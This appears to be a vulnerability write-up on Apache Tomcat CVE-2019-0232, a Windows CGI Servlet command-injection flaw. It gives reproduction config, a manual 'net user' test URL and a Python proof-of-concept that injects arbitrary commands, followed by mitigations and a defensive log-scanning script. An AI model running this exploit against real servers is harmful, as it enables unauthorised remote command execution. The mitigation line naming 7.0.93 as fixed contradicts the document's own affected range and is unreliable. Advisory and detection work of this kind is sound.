Apache Tomcat CVE-2019-0232 Remote Code Execution Vulnerability
Vulnerability overview
On 10 April 2019, Apache Tomcat reported a vulnerability: Apache Tomcat running on Windows is affected by a remote code execution flaw, assigned CVE-2019-0232. On the Windows platform a remote attacker can send a specially crafted request to the CGI Servlet and inject and execute arbitrary operating-system commands on the host with the privileges of the Apache Tomcat process. The root cause is insufficient input validation in the CGI Servlet when arguments are passed from the JRE to the Windows environment. The CGI Servlet is disabled by default.
Affected versions
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93
Reproduction
Test environment
Tomcat 8.5.39
JDK 8u121
0x00 Modify the configuration files
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>cgiPathPrefix</param-name>
        <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
        <param-name>executable</param-name>
        <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>
<!-- The mapping for the CGI Gateway servlet -->
<servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
<Context privileged="true">
    <!-- Default set of monitored resources. If one of these changes, the -->
    <!-- web application will be reloaded.                                -->
    <WatchedResource>l</WatchedResource>
    <WatchedResource>${catalina.base}/l</WatchedResource>
    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>
Move the WEB-INF directory into /webapps/ROOT and start Tomcat (the WEB-INF directory can be downloaded from the reference link below). Manual test:
127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user
PoC
import requests
import sys

# localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%+user
if len(sys.argv) != 3:
    print("Usage: python CVE-2019-0232.py url cmd")
    sys.exit(1)

url = sys.argv[1]        # base URL of the target, e.g. http://127.0.0.1:8080
# CGI script plus the encoded argument prefix (C:\Windows\System32\)
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]        # command name appended to the argument
vuln_url = url + url_dir + cmd
print("The Vuln url:\n\n", vuln_url)
r = requests.get(vuln_url)   # send the crafted request
print("\nThe Vuln Response Content: \n\n", r.text)
Mitigation
Users of affected versions should apply one of the following mitigations. Upgrade to:
Apache Tomcat 9.0.18 or later
Apache Tomcat 8.5.40 or later
Apache Tomcat 7.0.93 or later
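As an added defender-side example (not part of the original write-up), the following Python script scans Tomcat access-log lines for requests to the CGI servlet whose query string carries command-line arguments, which is the request shape used in the manual test above, and flags any decoded argument that falls outside a conservative allow-list. The sample log lines are constructed, the /cgi-bin/ prefix is taken from the web.xml mapping above, and the allow-list character set is an assumption modelled on the argument-pattern check that the fixed versions apply.

```python
import re
from urllib.parse import unquote

# Constructed sample Tomcat access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2019:10:00:00 +0000] "GET /cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user HTTP/1.1" 200 512
10.0.0.6 - - [10/Apr/2019:10:00:01 +0000] "GET /cgi-bin/hello.bat?name=alice HTTP/1.1" 200 44
10.0.0.7 - - [10/Apr/2019:10:00:02 +0000] "GET /cgi-bin/hello.bat?report+2019 HTTP/1.1" 200 44
10.0.0.8 - - [10/Apr/2019:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# URL prefix of the CGI servlet mapping, matching the web.xml above.
CGI_PREFIX = "/cgi-bin/"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Assumed allow-list for one decoded argument: letters, digits, '-', '.', '_', '/'.
# Anything else (backslash, colon, space, '&', ...) is treated as suspicious.
SAFE_ARG = re.compile(r'^[a-zA-Z0-9._/-]+$')


def cgi_command_line_args(query: str) -> list[str]:
    """RFC 3875 section 4.4: a query string that contains no '=' is split on '+'
    and each URL-decoded piece is handed to the CGI script as a command-line
    argument. A query with '=' is ordinary form data and yields no arguments."""
    if not query or "=" in query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]


def scan_access_log(log_text: str) -> list[dict]:
    """Return one finding per request to the CGI servlet whose decoded
    command-line arguments contain characters outside SAFE_ARG."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.startswith(CGI_PREFIX):
            continue
        bad = [arg for arg in cgi_command_line_args(query) if not SAFE_ARG.match(arg)]
        if bad:
            findings.append({"ip": m.group("ip"), "script": path, "args": bad})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['script']} suspicious CGI arguments: {f['args']}")
```

Run against real logs, the same check applies to the access log's request field; the first sample line is the only one reported because its decoded argument begins with '&' and contains a Windows path.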
References